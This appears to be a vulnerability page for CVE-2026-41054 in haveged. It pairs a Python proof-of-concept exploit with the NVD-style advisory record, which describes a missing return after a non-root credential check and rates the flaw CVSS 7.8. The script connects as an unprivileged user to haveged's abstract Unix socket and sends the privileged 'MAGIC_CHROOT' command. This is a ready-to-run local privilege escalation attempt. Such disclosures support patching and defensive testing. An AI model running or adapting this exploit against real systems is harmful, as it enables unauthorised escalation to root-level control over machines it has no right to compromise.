CVE-2026-41054

import socket import sys # PoC for CVE-2026-41054: Haveged Privilege Escalation # This script demonstrates how a low-privileged user can connect to the # abstract Unix socket and potentially execute privileged commands. SOCKET_PATH = "\0/sys/entropy/haveged" def exploit(): try: # Create a Unix domain socket sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) # Connect to the abstract socket used by haveged print(f"[*] Connecting to {SOCKET_PATH}...") sock.connect(SOCKET_PATH) print("[+] Connected successfully.") # The vulnerability allows non-root users to send commands. # 'MAGIC_CHROOT' is mentioned in the description as a privileged command. # Sending a dummy command to trigger the switch statement without root check. payload = b"MAGIC_CHROOT" print(f"[*] Sending payload: {payload.decode()}") sock.sendall(payload) # Attempt to receive response response = sock.recv(1024) print(f"[+] Received response: {response.decode(errors='ignore')}") except Exception as e: print(f"[-] An error occurred: {e}") finally: sock.close() if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-41054", "sourceIdentifier": "[email protected]", "published": "2026-05-20T10:16:26.990", "lastModified": "2026-05-20T14:25:57.283", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In `src/havegecmd.c`, the `socket_handler` function performs a credential check on the abstract UNIX socket (`\\0/sys/entropy/haveged`). However, while it detects if the connecting user is not root (`cred.uid != 0`) and prepares a negative acknowledgement (`ASCII_NAK`), it **fails to stop execution**. The code proceeds to the `switch` statement, allowing any local unprivileged user to execute privileged commands such as `MAGIC_CHROOT`."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-305"}]}], "references": [{"url": "https://bugzilla.suse.com/show_bug.cgi?id=CVE-2026-41054", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/19/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/19/4", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/19/5", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/20/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}